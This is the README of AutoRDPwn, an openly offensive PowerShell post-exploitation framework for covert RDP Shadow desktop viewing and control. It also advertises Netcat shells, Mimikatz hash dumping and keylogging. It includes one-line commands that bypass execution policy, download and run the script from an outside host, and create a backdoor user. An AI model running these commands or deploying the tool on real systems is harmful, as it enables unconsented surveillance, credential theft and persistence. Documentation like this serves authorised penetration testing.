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AutoRDPwn

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

Powershell 4.0 or higher

Changes

Version 5.1

• Many bugs fixed

• Aesthetic improvements and improved waiting times

• Proxy-Aware connection through system settings

• It is now possible to use the offline tool by downloading the .zip file

• Language auto-detection by pressing the enter key

• Invoke-DCOM has been replaced by SharpRDP

• PowerUp has been replaced by Invoke-PrivescCheck

• Creation of the automatic cleaning subroutine in the victim

• New module available: SMB Shell encrypted with AES

• New module available: Change user with RunAs

*The rest of the changes can be consulted in the CHANGELOG file

Usage

This application can be used locally, remotely or to pivot between teams.

When used remotely in a reverse shell, it is necessary to use the following parameters:

Parameter Description
-admin / -noadmin Depending on the permissions we have, we will use one or the other
-nogui This will avoid loading the menu and some colors, guaranteed its functionality
-lang We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option As with the menu, we can choose how to launch the attack
-shadow We will decide if we want to see or control the remote device
-createuser This parameter is optional, the user AutoRDPwn:AutoRDPwn will be created on the victim machine
-noclean Disables the process of undoing all changes on the victim computer

Local execution on one line:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on a line:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link:

https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

AutoRDPwn1_en AutoRDPwn2_en

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This framework has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Some modules use third-party code, scripts, and tools, particularly:

Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap

SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP

And many more, that do not fit here.. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.

Support

You can support my work buying me a coffee:

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